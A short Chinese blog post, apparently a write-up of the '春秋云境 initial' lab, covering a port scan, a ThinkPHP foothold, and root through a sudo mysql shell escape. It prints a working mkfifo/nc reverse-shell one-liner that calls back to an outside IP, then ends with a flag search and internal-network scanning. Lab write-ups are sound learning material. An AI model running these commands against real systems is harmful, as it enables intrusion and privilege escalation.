p1nk's blog

春秋云境 initial

先看看开了哪些端口

1	.\kscan_windows_amd64.exe -t 121.89.198.102 -sV

貌似就80可用

打开网站，熟悉的图标

有可能是spring和tp

默认tp吧

果然

那先getshell吧

www-data权限但有mysql无密码可以利用

1	sudo mysql -e '\! id'

1 2	sudo mysql -e '\! rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc 60.205.245.123 5555 >/tmp/f;'

反弹shell

试了很多payload，但是只有这个管用

1	rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|/bin/sh -i 2>&1\|nc 60.205.245.123 5555 >/tmp/f;

拿到root直接找到找flag

1	find / -name flag

传fscan扫内网

This work is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License .

▲

▼